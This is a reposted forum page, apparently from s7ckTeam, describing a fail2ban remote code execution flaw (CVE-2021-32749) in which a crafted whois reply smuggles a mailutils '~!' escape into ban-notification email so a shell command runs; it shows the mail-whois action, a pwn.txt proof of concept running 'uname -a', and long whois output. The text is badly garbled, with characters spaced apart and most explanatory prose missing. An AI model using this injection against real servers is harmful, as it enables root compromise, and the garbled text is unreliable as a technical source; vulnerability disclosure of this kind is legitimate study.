[29094] 2021-07-29_【漏洞利用】fail2ban-远程代码执行

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-19
2021-07-29_【漏洞利用】fail2ban-远程代码执行 f a i l 2 b a n   -   O t s   2 0 2 1 - 0 7 - 2 9 O t s F a i l 2 B a n P y t h o n U n i x I p t a b l e s T C P   W r a p p e r f a i l 2 b a n   (   C V E - 2 0 2 1 - 3 2 7 4 9   )   m a i l u t i l s   m a i l   f a i l 2 b a n   便   I P   S S H S M T P H T T P     I n t e r n e t   f a i l 2 b a n . / c o n f i g / a c t i o n . d / m a i l - w h o i s . c o n f   m a i l u t i l s ' ~ '   e s c a p e   使 使   s h e l l ' ~ | '   s h e l l   $   e c h o   " t e s t   e - m a i l "   |   m a i l   - s   " s u b j e c t "   u s e r @ e x a m p l e . o r g a c t i o n b a n   =   p r i n t f   % % b   " H i , n                         T h e   I P   < i p >   h a s   j u s t   b e e n   b a n n e d   b y   F a i l 2 B a n   a f t e r < f a i l u r e s >   a t t e m p t s   a g a i n s t   < n a m e > . n n                         H e r e   i s   m o r e   i n f o r m a t i o n   a b o u t   < i p >   : n                         ` % ( _ w h o i s _ c o m m a n d ) s ` n                         R e g a r d s , n                         F a i l 2 B a n " | m a i l   - s   " [ F a i l 2 B a n ]   < n a m e > :   b a n n e d   < i p >   f r o m   < f q - h o s t n a m e > "   < d e s t > j z @ f a i l 2 b a n : ~ $   c a t   - n   p w n . t x t 1     N e x t   l i n e   w i l l   e x e c u t e   c o m m a n d   : ) 2     ~ !   u n a m e   - a 3 4     B e s t , 5     J Z j z @ f a i l 2 b a n : ~ $   c a t   p w n . t x t   |   m a i l   - s   " w h a t e v e r "   w h a t e v e r @ w h a t e v e r . c o m
  f a i l 2 b a n   w h o i s   I P     w h o i s   -       w h o i s     I S P     R I P E     I P   R I P E / A R I N / A P N I C     I P     I P     w h o i s     w h o i s     -     I n t e r n e t     w h o i s     R F C R e f e r r a l S e r v e r   w h o i s     I P     1 5 7 . 5 . 7 . 5   I P     w h o i s   L i n u x   f a i l 2 b a n   4 . 1 9 . 0 - 1 6 - c l o u d - a m d 6 4   # 1   S M P   D e b i a n   4 . 1 9 . 1 8 1 - 1   ( 2 0 2 1 - 0 3 - 1 9 )   x 8 6 _ 6 4   G N U / L i n u x j z @ f a i l 2 b a n : ~ $ $   w h o i s   1 5 7 . 5 . 7 . 5 # #   A R I N   W H O I S   d a t a   a n d   s e r v i c e s   a r e   s u b j e c t   t o   t h e   T e r m s   o f   U s e #   a v a i l a b l e   a t :   h t t p s : / / w w w . a r i n . n e t / r e s o u r c e s / r e g i s t r y / w h o i s / t o u / # #   I f   y o u   s e e   i n a c c u r a c i e s   i n   t h e   r e s u l t s ,   p l e a s e   r e p o r t   a t #   h t t p s : / / w w w . a r i n . n e t / r e s o u r c e s / r e g i s t r y / w h o i s / i n a c c u r a c y _ r e p o r t i n g / # #   C o p y r i g h t   1 9 9 7 - 2 0 2 1 ,   A m e r i c a n   R e g i s t r y   f o r   I n t e r n e t   N u m b e r s ,   L t d . # N e t R a n g e :               1 5 7 . 1 . 0 . 0   -   1 5 7 . 1 4 . 2 5 5 . 2 5 5 C I D R :                       1 5 7 . 4 . 0 . 0 / 1 4 ,   1 5 7 . 1 4 . 0 . 0 / 1 6 ,   1 5 7 . 1 . 0 . 0 / 1 6 ,   1 5 7 . 1 2 . 0 . 0 / 1 5 ,   1 5 7 . 2 . 0 . 0 / 1 5 ,   1 5 7 . 8 . 0 . 0 / 1 4 N e t N a m e :                 A P N I C - E R X - 1 5 7 - 1 - 0 - 0 N e t H a n d l e :             N E T - 1 5 7 - 1 - 0 - 0 - 1 P a r e n t :                   N E T 1 5 7   ( N E T - 1 5 7 - 0 - 0 - 0 - 0 ) N e t T y p e :                 E a r l y   R e g i s t r a t i o n s ,   T r a n s f e r r e d   t o   A P N I C O r i g i n A S : O r g a n i z a t i o n :       A s i a   P a c i f i c   N e t w o r k   I n f o r m a t i o n   C e n t r e   ( A P N I C ) [   c u t   ] R e f e r r a l S e r v e r :     w h o i s : / / w h o i s . a p n i c . n e t R e s o u r c e L i n k :     h t t p : / / w q . a p n i c . n e t / w h o i s - s e a r c h / s t a t i c / s e a r c h . h t m l
使   R W h o i s     -     r w h o i s     w h o i s       -     w h o i s       I P   w h o i s   M I T M       m a i l u t i l s 使     -   怀 O r g T e c h H a n d l e :   A W C 1 2 - A R I N O r g T e c h N a m e :       A P N I C   W h o i s   C o n t a c t O r g T e c h P h o n e :     + 6 1   7   3 8 5 8   3 1 8 8 O r g T e c h E m a i l :     s e a r c h - a p n i c - n o t - a r i n @ a p n i c . n e t [   c u t   ] F o u n d   a   r e f e r r a l   t o   w h o i s . a p n i c . n e t . %   [ w h o i s . a p n i c . n e t ] %   W h o i s   d a t a   c o p y r i g h t   t e r m s         h t t p : / / w w w . a p n i c . n e t / d b / d b c o p y r i g h t . h t m l %   I n f o r m a t i o n   r e l a t e d   t o   ' 1 5 7 . 0 . 0 . 0   -   1 5 7 . 2 5 5 . 2 5 5 . 2 5 5 ' %   A b u s e   c o n t a c t   f o r   ' 1 5 7 . 0 . 0 . 0   -   1 5 7 . 2 5 5 . 2 5 5 . 2 5 5 '   i s   ' h e l p d e s k @ a p n i c . n e t ' i n e t n u m :                 1 5 7 . 0 . 0 . 0   -   1 5 7 . 2 5 5 . 2 5 5 . 2 5 5 n e t n a m e :                 E R X - N E T B L O C K d e s c r :                     E a r l y   r e g i s t r a t i o n   a d d r e s s e s [   c u t   ]

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则